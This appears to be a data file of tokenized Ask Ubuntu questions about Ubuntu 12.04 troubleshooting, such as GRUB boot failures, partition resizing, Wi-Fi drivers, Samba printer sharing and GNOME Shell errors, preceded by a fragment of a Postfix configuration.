virtual_mailbox_base = /var/vmail virtual_mailbox_domains = mysql : /etc/postfix/mysql_virtual_domains_maps.cf virtual_mailbox_maps = mysql : /etc/postfix/mysql_virtual_mailbox_maps.cf , mysql : /etc/postfix/mysql_virtual_mailbox_domainaliases_maps.cf virtual_transport = dovecot virtual_uid_maps = static:150
167178	gtk2.0 theme problem with button foreground	i have noticed that i can only change the foreground color of a gtk2.0 theme button with the `` default '' style . i did it like : style `` default '' { fg [ normal ] = `` # 000000 '' fg [ prelight ] = `` # 000000 '' fg [ selected ] = `` # 000000 '' fg [ insensitive ] = `` # 000000 '' fg [ active ] = `` # 000000 '' } class `` gtkwidget '' style `` default '' style `` button '' { fg [ normal ] = `` # ff0000 '' fg [ active ] = `` # ff0000 '' fg [ prelight ] = `` # ff0000 '' fg [ insensitive ] = `` # ff0000 '' } widget_class `` *gtktext '' style `` button '' class `` gtkbutton '' style `` button '' widget_class `` *gtkbutton* '' style `` button '' the 3 assignments are to test if any work but the button text and all the other text color are black how it is defined within the `` default '' style . i tried to look if a foreground color can be changed in other widgets and it does . for a list view i could change the foreground color of the header columns ( where i can sort the list ) if i change the fg [ normal ] within the default style to `` # ff0000 '' the button will get red like expected but also any other text too which is also expected . can anybody tell me how i can change only the foreground color of a gtk2.0 button ? edit i forgot to tell that if i change the background image using pixmap engine the background images appeared so the `` style assignation '' work well but the fg color will not be overridden . edit to provide you more information : i have installed the latest gtk3 and gtk2 libs/engines ( apt-get upgrade ) also i tried ( additional to the gtk2.0 theme settings ) the gtk3.0 settings for the css selector : button , gtkbutton , button.default , gtkbutton.default , button * , gtkbutton * button.default * , gtkbutton.default * , { color : # ff0000 ; } button : hover , gtkbutton : hover , button : hover * , gtkbutton : hover * , button.default : hover , gtkbutton.default : hover , button.default : hover * , gtkbutton.default : hover * { color : # ff0000 ; } button : active , gtkbutton : active , button : active * , gtkbutton : active * , button.default : active , gtkbutton.default : active , button.default : active * , gtkbutton.default : active * { color : # ff0000 ; } button : hover : active , gtkbutton : hover : active , button : hover : active * , gtkbutton : hover : active * , button.default : hover : active , gtkbutton.default : hover : active , button.default : hover : active * , gtkbutton.default : hover : active * { color : # ff0000 ; } this also has no effects . my system is ubuntu 12.04 gnome3 classic mode with effects windowmanager : emerald
167182	can not summon gnome-do	i use awesomewm and i have installed gnome-do . when i start it , i see this : [ systemservice ] could not initialize dbus : unable to open the session message bus . ( do:3128 ) : wnck-critical ** : wnck_set_client_type got called multiple times . ( do:3128 ) : libdo-warning ** : binding ' < super > space ' failed ! it is clear , it can not map space combination , because awesomewm uses this one . however , i can see gnome-do in my processes . how i can summon it ? some people tell me that i should see the gnome-do welcome window , but i do n't . i tried what is written in this post ( http : //askubuntu.com/questions/157195/force-rewrite-of-gnome-do-summon-binding-on-login-because-keeps-being-set-to-dis ) . but it does not work , because every time i restart gnome-do , my binding written by hands disappears .
167183	would dual-booting ubuntu 12.04 with windows 7 work succesfully on a sony vaio e series laptop ?	can anyone please tell me if the sony vaio e series or any other series ( t or s ) would work fine with windows 7 and ubuntu 12.04 in a dual-boot configuration ? i am planning to buy a sony vaio e series with following specs : 14 '' premium e series sony vaio laptop ( sve14a15fds or sve14a15fdb ) 3rd gen intel® core™ i5-3210m processor ( 2.50ghz / 3.10ghz ) , intel® hd graphics 4000 installed memory : 6gb ( 4gb x 1 + 2gb x 1 ) memory type/speed : ddr3 sdram , pc3-10600 1333 mhz storage storage capacity : 750 gb2 storage technology : serial ata storage type : hdd 5400 rpm wireless : bluetooth® technology : bluetooth® standard ver . 4.0 + hs ethernet protocol : 1000base-t/100base-tx/10base-t widi ready : intel® wireless display technology wifi adapter : wifi adapter : intel® centrino® wireless-n 2230 ( 802.11b/g/n ) please tell me if the above or any other configurations would work successfully with dual-boot with sony vaio 2012 laptops . any comments/suggestions are really appreciated .
167189	lost ubuntu partition	my ubuntu crashed yesterday and after rebooting the grub rescue showed up . i 've never used grub before but when i tried ls look like there are only windows partitions there . grub > ls ( memdisk ) ( loop0 ) ( hd0 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) i also tried booting from live cd and use fdisk . however there is no ubuntu partition listed . i am newbie and do n't know what i can do next . please help . thanks in advance .
167193	stop alt from trying to drag my window ?	i can not find it in the keyboard settings at all . in previous versions there was a tick box saying something along the lines of `` use meta key instead of alt to drag windows ? '' so how can i prevent alt trying to do this ? : )
167196	how can i increase the space of /home without losing my data ?	i am currently running ubuntu 12.04 lts , installed via wubi on a windows 7 machine . my hdd is 1 tb . when i installed via wubi i used the maximum 30 gb installation size . since then , i have decided i want to make ubuntu my primary operating system . so my question is , how do i increase the size of /home without losing my data ? while i 'm not a total noob to linux i am by no means an advanced user . i downloaded ubuntu-12.04-desktop-amd64.iso from ubuntu.com , made a bootable disk out of my usb drive , and started up the `` trial version '' of ubuntu . i ran the installer until i got to this screen i did n't want to install in windows - that 's what i already have through wubi and what i 'm trying to fix . nor do i want to replace windows because there are still a few tasks here and there that i still need it to run . so i clicked the `` something else '' option . i was greeted with this screen i know virtually nothing about partitions because i 've never had to mess with them before . so i clicked `` install now '' and prayed that it would work . instead , i got this error message like i said in my first edit , i 'm by no means an advanced user , but you seem to know quite a bit about partitions , so can you help me ?
167199	what key to press to get to the bios and change boot sequence on a dell desktop ?	what do i press to boot to the usb i just made ? is it f12 or f2 ? because i pressed f12 in beginning but it did not work and just normally started windows again . i have xp by the way .
167200	workspace switcher moves my terminal windows around	i have 4 workspaces that i use ( 2x2 grid ) . i 'm experiencing very odd and unpredictable behavior : i find that my terminal windows seem to get moved around ( usually up or down one workspace . ) half the time they end up being halfway between the two workspaces . this happens very frequently but i do n't know if anything i do causes it . is this a known issue , and can i do anything about it ?
167203	how to search for files and file contents with gui ?	when i use the search function in nautilus it only returns files with matching file names . it does n't even support wildcards , for example `` *.txt '' returns nothing . i would expect it to return all .txt files . anyway , is there a way , without using the command line , to search the contents of files , including all plain text files ( .txt , .html , .css , .js , .c , .csv , .sh , .py , ... ) , archives ( .zip , .7z , .rar , .tar , ... ) , office/libreoffice files ( .doc , .docx , pptx , .odf , .ods , ... ) , and media ( .mp3 , .mp4 , ... ) meta data ? the search should also have the option of setting file size , date , type , and being case insensitive .
167205	apache 2.4 install on 12.04 ends up with non-standard configuarion	i 've just done an install of apache 2.4 following the steps outlined here : http : //edin.no-ip.com/blog/hswong3i/apache-2-4-php5-4-pdo-oci-ubuntu-12-04-howto ( except for the oracle specific stuff ) . however , i 've now ended up with apache using the config in /usr/local/apache2/conf/httpd.conf , not /etc/apache2/apache2.conf as i 'm used to . httpd.conf does n't seem to have been setup to use sites-available and mods-available and all that goodness . what 's the best solution for this ? is there something i can tweak quickly to get it to work as expected , or is 2.4 not expected to work that way in 12.04 ? thanks for any help .
167210	unable to install flash plugin in ubuntu ?	i need to install flashplugin in all the ubuntu systems . so i have downloaded the flashplugin via wget wget http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.228.orig.tar.gz . the file got downloaded and i have moved the file to /var/www/ using wget i have downloaded this file on all the client systems . on executing i am getting the below error.. please help me on fixing this error.. error : root @ user219 : ~ # ./adobe-flashplugin_11.2.202.228.orig.tar.gz -bash : ./adobe-flashplugin_11.2.202.228.orig.tar.gz : can not execute binary file update 1 : i can see the automated install when runs `` apt-get install flashplugin-installer '' follows these steps.. downloading ... -- 2012-07-24 01:17:13 -- http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.228.orig.tar.gz resolving archive.canonical.com ... 91.189.92.150 , 91.189.92.191 connecting to archive.canonical.com|91.189.92.150|:80 ... connected . http request sent , awaiting response ... 200 ok length : 14133169 ( 13m ) [ application/x-gzip ] saving to : `` ./adobe-flashplugin_11.2.202.228.orig.tar.gz' 0k ... ... .. ... ... .. ... ... .. ... ... .. ... ... .. ... ... .. 22 % 343k 31s 3072k ... ... .. ... ... .. ... ... .. ... ... .. ... ... .. ... ... .. 44 % 508k 19s 6144k ... ... .. ... ... .. ... ... .. ... ... .. ... ... .. ... ... .. 66 % 479k 11s 9216k ... ... .. ... ... .. ... ... .. ... ... .. ... ... .. ... ... .. 89 % 400k 4s 12288k ... ... .. ... ... .. ... ... . 100 % 356k=33s 2012-07-24 01:17:47 ( 414 kb/s ) - ./adobe-flashplugin_11.2.202.228.orig.tar.gz ' saved [ 14133169/14133169 ] download done . flash plugin installed .
167212	size 1280x800 not found in available modes ?	i 'm fairly new to ubuntu and am trying to learn more . while looking for information on something unrelated , someone suggested using ctrl+alt+f2 , when i did this it went to a terminal screen , and i could n't figure out how to get out , so i restarted my computer . when it loaded back up , it was in 640x480 . i went to the terminal and put in xrandr -s 1280x800 ( that 's not my screens resolution , it 's much higher but i ca n't remember the exact value ) and it said to me size 1280x800 is not found in available mode i 'm using a nvidia geforce gt 540m video card , i heard that might be a problem ... i 'm stuck at 640x480 right now..so please someone help ! haha thanks in advance .
167215	installation of realtek usb wifi dongle	i want to install a usb wifi dongle under 12.04 . i already searched the net for help , but did not find anything that helped . the dongle is a realtek semiconductor corp. rtl8188su 802.11n wlan adapter ( that is what is returned by lsusb ) the stick came with a driver cd and contained also some linux drivers . the driver file is called `rtl8712_8188_8191_8192su_usb_linux_v2.6.0006.20100202.zip could someone please instruct me , how to install the drivers so that the stick works ? or point me to some easy instructions ?
167218	how can i speed up the video streaming using vlc ?	i would like to stream my webcam through network , i 'm using the following command vlc v4l2 : // : v4l2-dev=/dev/video0 : v4l2-width=640 : v4l2-height=480 -- sout= '' # transcode { vcodec=h264 , vb=800 , scale=1 , acodec=mp4a , ab=128 , channels=2 , samplerate=44100 } : rtp { sdp=rtsp : //:8554/live.ts } '' -i dummy i tested in the same network and i have around 10s delay . for me is acceptable the 1,2s delay . is there any other solution which is faster ? if i 'm using two vlc ( in the same computer ) one for streaming one for playing still i have the same delay . is it possible to reduce this delay using vlc or other solution ?
167232	open a new tab in gnome-terminal and have it automatically connect via ssh	i find myself ssh-ing into another machine a lot at work . so much so , that i use it more than simply using the terminal on my own desktop . i know that ( normally ) when i open a new tab , it will change the directory to be in the same folder that i am currently in . is there any way to have it check to see if i 'm ssh 'd into another machine and , if so , ssh into that machine as well so that i do n't have to key in the host , port , and flags for the new ssh with each open tab ?
167236	how to uninstall maas	i accidentally selected the options to install maas on a fresh install of ubuntu 12.04 . in order to remove the server/service , is it just a matter of `` sudo apt-get remove maas '' ?
167237	change size of root partition after installing ubuntu in windows	i recently installed ubuntu via the windows installer with 10 gb and wish to increase the size to 20 gb . is there a way to do so with out reinstalling ubuntu via windows ?
167243	how to uninstall the default screenshot app ?	i installed lightshot using wine and playonlinux , and it works really well . but , i think the default screenshot app is interfering with lightshot , with the actual prtscn button . i was wondering if there was a way to uninstall it ( meaning the default app ) or at least set its hotkey to something different ? note : i 'm using ubuntu 12.04 , in case you need this information thanks !
167247	how does sharing a file affect quotas in ubuntu one ?	if person a is at 4gb of their 5gb quota , and person b shares a folder , f , with them with 2gb data in it , has person a just gone 1gb over quota ? or does all of the content of f always belong to b 's quota ?
167251	ubuntu freezes , malfuncion , logs off suddenly	i 've been using linux since slackware 3.6 came out and as my main ( and only ) os since 2004 . i was using debian for a long time , but some friends told me that ubuntu was really matured and convinced me to change . my main reason to install ubuntu was that i wanted something that `` just works '' , so i could concentrate on important stuff . but since i installed ubuntu , i 've been running around trying to fix problems . my experience with it is quite different than probably most of you have had . the lastest issues i face are random syste freeze , some malfunctioning ( specially with flash ) and xorg crashing and getting me back to lightdm login screen . i think most of the issues can be atributed to nvidia and adobe , but still ... i just want the thing to work ! the specs of my computer are as follow : intelâž coreâ˘ i7 cpu 950 @ 3.07ghz . 24gb of ddr3 ram . nvidia geforce gts 250 1gb - running ( now ) the nvidia driver version 302.17 ( last attempt to fix the logoff issue ) . i use mainly chrome for web browsing , libreoffice and eclipse to work and i find myself losing stuff because of freezes and logoffs all the time . that besides the flash plugin crashes with chrome and firefox . i ca n't use unity other than unity 2d because it 'd loggoff all the time , so now i use gnome-shell , which i like , but it still gets me logged off and freezes from time to time , just as in unity just not as frequent . what should i do to get a better experience ? i am so used to linux that i ca n't just move to windows or macos anymore , so i need it to work ! thank you !
167253	cant upgrade because of duplicate files	i am unable to upgrade because i keep getting : w : duplicate sources.list entry http : //ppa.launchpad.net/cairo-dock-team/ppa/ubuntu/ maverick/main i386 packages ( /var/lib/apt/lists/ppa.launchpad.net_cairo-dock-team_ppa_ubuntu_dists_maverick_main_binary-i386_packages ) w : duplicate sources.list entry http : //ppa.launchpad.net/cairo-dock-team/ppa/ubuntu/ maverick/main i386 packages ( /var/lib/apt/lists/ppa.launchpad.net_cairo-dock-team_ppa_ubuntu_dists_maverick_main_binary-i386_packages ) e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/ppa.launchpad.net_bisigi_ppa_ubuntu_dists_maverick_main_binary-i386_packages e : the package lists or status file could not be parsed or opened .
167255	changed ownership/read , write on important system files , including sudo	i recently messed up my ownership and read/write rights to very important files which doesnt allow me to log in to ubuntu once past boot . i 've tried several chmod and chown commands to revert the files back but have a problem doing so , first off the ownership of the files is wrong , and on top of that some are only read files and i need to convert them . i get the error : sudo : must be setuid root as well as another error which says the ownership rights are 100 when they should be 0 ( root ) . i really do not want to re-install a fresh copy there are very important files on the system that i need .
167256	what editor is as good as textpad for compiling and running java programs ?	i want an editor that is as good as textpad ( for windows ) for compiling and running java programs on ubuntu 12.04 . please suggest one .
167261	how to enable alt-tab to browse windows ?	i am using gnome classical ( without effects ) , and recently alt-tab stopped working to switch windows . how to enable alt-tab to switch windows ?
167263	how can i remove `` show desktop '' from the alt-tab ( application ) switcher ?	is it possible to remove `` show desktop '' from the alt+tab application switcher ?
167264	waiting for network configuration network manager	i recently updated ubuntu to 12.04 and i have 2 problems : 1 . ) 'waiting for network configuration ' shows each time when starting computer 2 . ) i always have to type in terminal 'sudo /etc/init.d/network-manager start ' in order to get wireless connection working . how to configure to start it automatically with startup ? please help me to solve these 2 problems . thanks ,
167267	getting `` boot error '' when trying to boot from usb	i 'm wanting to try out ubuntu , so followed the instructions for how to install ubuntu onto a usb . i downloaded the .iso file , then the pendrivelinux 3 part process to make the usb bootable . i can see what looks like a full list of files on the usb ( including the wubi.exe application and the syslinux folder ) . when i try to restart the computer with the usb in , i get the dell start up screen , and then a black screen with `` boot error '' in the top right hand corner . setup options ( default ) are to boot from removable device , then hard disc . usb is brand new , straight out of the packet . computer : dell inspiron 530s bios : 1.0.13 os : windows vista home edition usb : emtec 8gb , formatted to fat32 i 've tried some of the tips in other help topics ( holding down ctrl key while restarting , removing all other usb devices ) . i tried to reformat the usb to something other than fat32 , but my only other options were ntfs or exfat ( not fat16 which was suggested in another topic ) .
167274	how can i edit a picture into an existing pdf file ?	i have a scanned pdf file which is an application form , and a picture which is the scanned version of my signature ( for example , this one ) and can be in any image format such as eps or png . i would like to put the signature picture on the blank space right to `` applicant : '' on the second page of the application form . i wonder how to do that ? i have tried the following methods , but none succeeded : the first way is using gimp . i first import the application form into gimp , and then paste the signature picture on the space right to `` applicant : '' on the second page of the application form . the problems are that : it seems that i can only import one page of the application form into gimp , not all of the two pages . also when i save the modification , the closest format to pdf i can save to is ps , and the resolution has been downgraded and the storage size of the saved file is 10 times bigger than the original application form and the signature picture . the second way is using libreoffice draw . i have installed the libreoffice-pdfimport package . but after i import the application form into libreoffice draw , all the scanned content is not imported , and the layout is different from the layout of the original application form . so what other ways can i try ? i would prefer some way that can lay the signature picture directly on the application form pdf file , without having to convert between formats , without having to create much bigger files while keeping the original resolution , without having to split and combine pages of a multi-page pdf file , without having to rasterize other parts of the pdf file , i.e . without losing the text that i added later to the application form pdf file by having to convert the whole pdf into images .
167275	ca n't install ubuntu 12.04 64 bit	i have just bought an hp pavilion dv6 ( intel i7 processor + 6g of ram ) running windows 7 ( 64 bits ) . i downloaded ubuntu 12.04 64 bits and correctly burned it to a dvd . my problem starts when i try to boot the computer from dvd as a first step to install ubuntu . in fact , the home page of ubuntu is shown without further prompts ( no button of install of try it before install ) . i tried the process many times without results . why could n't i install the 64 bits version of ubuntu 12.04 ( knowing that my laptop has a 64 bits architecture ) ? ? i would really like to install the 64 bits version to be able to get the most of my laptop .
167277	how can i to close apps from super+w ?	close apps from super+w so what i am interested in is if there is a way to close apps from super+w like this or is there a buton that i can press and the app wil cloas by default
167278	re : specific item names in config files	under a previous question 'does ubuntu use security features like dep and alsr ' it was mentioned `` if you are n't running a pae kernel , or your hardware lacks the nx bit , ubuntu emulates the nx feature '' . i wish to reconfigure kernel to delete ( not disable ) this ability to emulate the nx feature . what are the specific item names in config files i need to erase ?
167281	what 's the ubuntu equivalent of active directory ?	i have around a 40+ user network running ubuntu 12.04 desktop and ubuntu server . what is the best tool to use to run authentication on users ? webmin ? similar to what ad does for windows .
167287	can i make deb files for documents and other non-binary content ?	i would like to create .deb files with no binary content ( *.odt files , for example ) . the idea is to create a file that contains didactic files to learn certain discipline and an automatically package downloader , to get needed packages for discipline learning . for example , c # *.pdf tutorials followed for the download of monodevelop ( c # ide ) , for c # programming classes .
167289	grub does not display on older computer	i 'm trying to install ubuntu server 12.04 on an older desktop for a friend . the tower doesnt have an onboard graphics card , so we had to install an agp graphics card to plug in a monitor . the install all displayed correctly , but after completing , the monitor switched to `` no signal '' . i was able to boot into ubuntu initially by pressing enter on this invisible screen , and the os seemed to display correctly . i tried holding down shift , after modifying /etc/default/grub to have a timeout , to no avail . how can i fix this ?
167294	how to change the wine or playonlinux locale settings - ubuntu 12.04 ?	according do this post , wine 's locale settings ( like numbering format ) is based on ubuntu locale settings . if i have to change my ubuntu locale settings , how can i change locale settings in ubuntu 12.04 , making sure that `` monetary '' and other numerical format settings will be updated too ?
167304	how to create .desktop files and new menu without alacarte ?	i want to do something like this : my folder script contains ten scripts , i want to create .desktop files and new menu under applications called `` myscript '' . i 'm able to create .desktop with script but i do n't want to use alacarte but instead use a script process to make all in batch mode . i can not understand why the .desktop is shown only in category : other . yes i know it is possible to open alacarte and move the launchers in any category , but for a batch process i want to do this with a script . i do n't know how to obtain information because i do n't know how alacarte works . i have tested some of my .desktop by inserting the category : gnome ; gtk ; mymenu but the launchers go in menu : '' other '' . i hope my description is clear . i am using gnome shell 3 with ubuntu precise .
167308	unable to connect to samba printer	i have a headless ubuntu 12.04 server for files and printers . it shares files via samba just fine . however , the hp psc-750xi connected to the server via usb is not accessible from my ubuntu 12.04 laptop . i can browse for it in the printing control panel , but any attempt to authenticate my id to the printer with my user credentials results in the error `` this print share is not accessible '' . i have included the samba smb.conf file below . any help appreciated . thanks ... jgb # # sample configuration file for the samba suite for debian gnu/linux . # # # this is the main samba configuration file . you should read the # smb.conf ( 5 ) manual page in order to understand the options listed # here . samba has a huge number of configurable options most of which # are not shown in this example # # some options that are often worth tuning have been included as # commented-out examples in this file . # - when such options are commented with `` ; '' , the proposed setting # differs from the default samba behaviour # - when commented with `` # '' , the proposed setting is the default # behaviour of samba but the option is considered important # enough to be mentioned here # # note : whenever you modify this file you should run the command # `` testparm '' to check that you have not made any basic syntactic # errors . # a well-established practice is to name the original file # `` smb.conf.master '' and create the `` real '' config file with # testparm -s smb.conf.master > smb.conf # this minimizes the size of the really used smb.conf file # which , according to the samba team , impacts performance # however , use this with caution if your smb.conf file contains nested # `` include '' statements . see debian bug # 483187 for a case # where using a master file is not a good idea . # # ======================= global settings ======================= [ global ] log file = /var/log/samba/log. % m passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . obey pam restrictions = yes map to guest = bad user encrypt passwords = true passwd program = /usr/bin/passwd % u passdb backend = tdbsam dns proxy = no writeable = yes server string = % h server ( samba , ubuntu ) unix password sync = yes workgroup = workgroup syslog = 0 panic action = /usr/share/samba/panic-action % d usershare allow guests = yes max log size = 1000 pam password change = yes # # browsing/identification # # # # change this to the workgroup/nt-domain name your samba server will part of # server string is the equivalent of the nt description field # windows internet name serving support section : # wins support - tells the nmbd component of samba to enable its wins server # wins support = no # wins server - tells the nmbd components of samba to be a wins client # note : samba can be either a wins server , or a wins client , but not both ; wins server = w.x.y.z # this will prevent nmbd to search for netbios names through dns . # what naming service and in what order should we use to resolve host names # to ip addresses ; name resolve order = lmhosts host wins bcast # # # # networking # # # # # the specific set of interfaces / networks to bind to # this can be either the interface name or an ip address/netmask ; # interface names are normally preferred ; interfaces = 127.0.0.0/8 eth0 # only bind to the named interfaces and/or networks ; you must use the # 'interfaces ' option above to use this . # it is recommended that you enable this feature if your samba machine is # not protected by a firewall or is a firewall itself . however , this # option can not handle dynamic or non-broadcast interfaces correctly . ; bind interfaces only = yes # # # # debugging/accounting # # # # # this tells samba to use a separate log file for each machine # that connects # cap the size of the individual log files ( in kib ) . # if you want samba to only log through syslog then set the following # parameter to 'yes ' . # syslog only = no # we want samba to log a minimum amount of information to syslog . everything # should go to /var/log/samba/log . { smbd , nmbd } instead . if you want to log # through syslog you should set the following parameter to something higher . # do something sensible when samba crashes : mail the admin a backtrace # # # # # # # authentication # # # # # # # # `` security = user '' is always a good idea . this will require a unix account # in this server for every user accessing the server . see # /usr/share/doc/samba-doc/htmldocs/samba3-howto/servertype.html # in the samba-doc package for details . # security = user # you may wish to use password encryption . see the section on # 'encrypt passwords ' in the smb.conf ( 5 ) manpage before enabling . # if you are using encrypted passwords , samba will need to know what # password database type you are using . # this boolean parameter controls whether samba attempts to sync the unix # password with the smb password when the encrypted smb password in the # passdb is changed . # for unix password sync to work on a debian gnu/linux system , the following # parameters must be set ( thanks to ian kahan < < kahan @ informatik.tu-muenchen.de > for # sending the correct chat script for the passwd program in debian sarge ) . # this boolean controls whether pam will be used for password changes # when requested by an smb client instead of the program listed in # 'passwd program ' . the default is 'no ' . # this option controls how unsuccessful authentication attempts are mapped # to anonymous connections # # # # # # # # # # domains # # # # # # # # # # # # is this machine able to authenticate users . both pdc and bdc # must have this setting enabled . if you are the bdc you must # change the 'domain master ' setting to no # ; domain logons = yes # # the following setting only takes effect if 'domain logons ' is set # it specifies the location of the user 's profile directory # from the client point of view ) # the following required a [ profiles ] share to be setup on the # samba server ( see below ) ; logon path = \\ % n\profiles\ % u # another common choice is storing the profile in the user 's home directory # ( this is samba 's default ) # logon path = \\ % n\ % u\profile # the following setting only takes effect if 'domain logons ' is set # it specifies the location of a user 's home directory ( from the client # point of view ) ; logon drive = h : # logon home = \\ % n\ % u # the following setting only takes effect if 'domain logons ' is set # it specifies the script to run during logon . the script must be stored # in the [ netlogon ] share # note : must be store in 'dos ' file format convention ; logon script = logon.cmd # this allows unix users to be created on the domain controller via the samr # rpc pipe . the example command creates a user account with a disabled unix # password ; please adapt to your needs ; add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u # this allows machine accounts to be created on the domain controller via the # samr rpc pipe . # the following assumes a `` machines '' group exists on the system ; add machine script = /usr/sbin/useradd -g machines -c `` % u machine account '' -d /var/lib/samba -s /bin/false % u # this allows unix groups to be created on the domain controller via the samr # rpc pipe . ; add group script = /usr/sbin/addgroup -- force-badname % g # # # # # # # # # # printing # # # # # # # # # # # if you want to automatically load your printer list rather # than setting them up individually then you 'll need this # load printers = yes # lpr ( ng ) printing . you may wish to override the location of the # printcap file ; printing = bsd ; printcap name = /etc/printcap # cups printing . see also the cupsaddsmb ( 8 ) manpage in the # cupsys-client package . ; printing = cups ; printcap name = cups # # # # # # # # # # # # misc # # # # # # # # # # # # # using the following line enables you to customise your configuration # on a per machine basis . the % m gets replaced with the netbios name # of the machine that is connecting ; include = /home/samba/etc/smb.conf. % m # most people will find that this option gives better performance . # see smb.conf ( 5 ) and /usr/share/doc/samba-doc/htmldocs/samba3-howto/speed.html # for details # you may want to add the following on a linux system : # so_rcvbuf=8192 so_sndbuf=8192 # socket options = tcp_nodelay # the following parameter is useful only if you have the linpopup package # installed . the samba maintainer and the linpopup maintainer are # working to ease installation and configuration of linpopup and samba . ; message command = /bin/sh -c '/usr/bin/linpopup `` % f '' `` % m '' % s ; rm % s ' & # domain master specifies samba to be the domain master browser . if this # machine will be configured as a bdc ( a secondary logon server ) , you # must set this to 'no ' ; otherwise , the default behavior is recommended . # domain master = auto # some defaults for winbind ( make sure you 're not using the ranges # for something else . ) ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash # the following was the default behaviour in sarge , # but samba upstream reverted the default because it might induce # performance issues in large organizations . # see debian bug # 368251 for some of the consequences of *not* # having this setting and smb.conf ( 5 ) for details . ; winbind enum groups = yes ; winbind enum users = yes # setup usershare options to enable non-root users to share folders # with the net usershare command . # maximum number of usershare . 0 ( default ) means that usershare is disabled . ; usershare max shares = 100 # allow users who 've been granted usershare privileges to create # public shares , not just authenticated ones # ======================= share definitions ======================= # un-comment the following ( and tweak the other settings below to suit ) # to enable the default home directory shares . this will share each # user 's home director as \\server\username ; [ homes ] ; comment = home directories ; browseable = no # by default , the home directories are exported read-only . change the # next parameter to 'no ' if you want to be able to write to them . ; read only = yes # file creation mask is set to 0700 for security reasons . if you want to # create files with group=rw permissions , set next parameter to 0775. ; create mask = 0700 # directory creation mask is set to 0700 for security reasons . if you want to # create dirs . with group=rw permissions , set next parameter to 0775. ; directory mask = 0700 # by default , \\server\username shares can be connected to by anyone # with access to the samba server . un-comment the following parameter # to make sure that only `` username '' can connect to \\server\username # the following parameter makes sure that only `` username '' can connect # # this might need tweaking when using external authentication schemes ; valid users = % s # un-comment the following and create the netlogon directory for domain logons # ( you need to configure samba to act as a domain controller too . ) ; [ netlogon ] ; comment = network logon service ; path = /home/samba/netlogon ; guest ok = yes ; read only = yes # un-comment the following and create the profiles directory to store # users profiles ( see the `` logon path '' option above ) # ( you need to configure samba to act as a domain controller too . ) # the path below should be writable by all users so that their # profile directory may be created the first time they log on ; [ profiles ] ; comment = users profiles ; path = /home/samba/profiles ; guest ok = no ; browseable = no ; create mask = 0600 ; directory mask = 0700 [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes guest ok = no read only = yes create mask = 0700 # windows clients look for this share name as a source of downloadable # printer drivers [ print $ ] comment = printer drivers browseable = yes writeable = no path = /var/lib/samba/printers # uncomment to allow remote administration of windows print drivers . # you may need to replace 'lpadmin ' with the name of the group your # admin users are members of . # please note that you also need to set appropriate unix permissions # to the drivers directory for these users to have write rights in it ; write list = root , @ lpadmin # a sample share for sharing your cd-rom with others . ; [ cdrom ] ; comment = samba server 's cd-rom ; read only = yes ; locking = no ; path = /cdrom ; guest ok = yes # the next two parameters show how to auto-mount a cd-rom when the # cdrom share is accesed . for this to work /etc/fstab must contain # an entry like this : # # /dev/scd0 /cdrom iso9660 defaults , noauto , ro , user 0 0 # # the cd-rom gets unmounted automatically after the connection to the # # if you do n't want to use auto-mounting/unmounting make sure the cd # is mounted on /cdrom # ; preexec = /bin/mount /cdrom ; postexec = /bin/umount /cdrom [ mediafiles ] path = /media/multimedia/
167310	why do i get directed to grub screen instead of booting completely ?	i am a new user of ubuntu and only recently have had problems with booting . it either fails to recognize my monitor or sends me directly to a grub screen rather than booting completely . this is my grub file : grub_default= '' 0 '' # grub_hidden_timeout= '' 0 '' grub_hidden_timeout_quiet= '' true '' grub_timeout=10 grub_distributor= '' `lsb_release -i -s 2 > /dev/null || echo debian` '' grub_cmdline_linux_default= '' quiet splash nomodeset '' grub_cmdline_linux= '' reboot=efi '' grub_gfxmode=1920x1200x60 i 'm curious about the reboot=efi . in my research , i 've seen that they are not included in other codes . could this be a problem ?
167312	unity + gnome 3 broke on update -- nvidia card -- opengl working	think the title is fairly clear ( system specs below ) i can not get unity ( 2d works ) nor gnome 3 to load properly since an update run last friday thus far i 've tried installing propietary drivers manually download from web-site reboot to system recovery console and install latest long lived branch version : 295.59 latest short lived branch version : 302.17 installing nvidia-current the ubuntu default version at 295.40 the x-swat version ( currently running ) at version 3.02.xx ( forget extension -- currently unable to switch windows to check ) including variations of tinkering with xorg.conf and such current logs do n't show any errors ( will paste in once i get on a system that can switch windows to copy and paste over network ) checking - dmesg - kern.log - xorg.0.log glxgears shows running 75 fps under gnome 3 in a window so the opengl parts seem to be working , and nvidia-settings shows everything working fine , but i get a dependency error when i try to run gnome directly ( again i 'll paste in reference ) gnome 3 error $ gnome-shell js error : ! ! ! exception was : error : requiring gjsdbus , version none : typelib file for namespace 'gjsdbus ' ( any version ) not found js error : ! ! ! linenumber = '0' js error : ! ! ! filename = ' '' gjs_throw '' ' js error : ! ! ! stack = ' '' ( `` requiring gjsdbus , version none : typelib file for namespace 'gjsdbus ' ( any version ) not found '' ) @ gjs_throw:0 @ /usr/share/gjs-1.0/overrides/gio.js:23 '' ' js error : ! ! ! message = ' '' requiring gjsdbus , version none : typelib file for namespace 'gjsdbus ' ( any version ) not found '' ' js error : ! ! ! exception was : typeerror : gio.dbusproxy.makeproxywrapper is not a function js error : ! ! ! linenumber = '24' js error : ! ! ! filename = ' '' /usr/share/gnome-shell/js/misc/gnomesession.js '' ' js error : ! ! ! stack = ' '' @ /usr/share/gnome-shell/js/misc/gnomesession.js:24 '' ' js error : ! ! ! message = ' '' gio.dbusproxy.makeproxywrapper is not a function '' ' js error : ! ! ! exception was : typeerror : gio.dbusproxy.makeproxywrapper is not a function js error : ! ! ! linenumber = '24' js error : ! ! ! filename = ' '' /usr/share/gnome-shell/js/misc/gnomesession.js '' ' js error : ! ! ! stack = ' '' @ /usr/share/gnome-shell/js/misc/gnomesession.js:24 '' ' js error : ! ! ! message = ' '' gio.dbusproxy.makeproxywrapper is not a function '' ' js error : ! ! ! exception was : typeerror : gio.dbusproxy.makeproxywrapper is not a function js error : ! ! ! linenumber = '24' js error : ! ! ! filename = ' '' /usr/share/gnome-shell/js/misc/gnomesession.js '' ' js error : ! ! ! 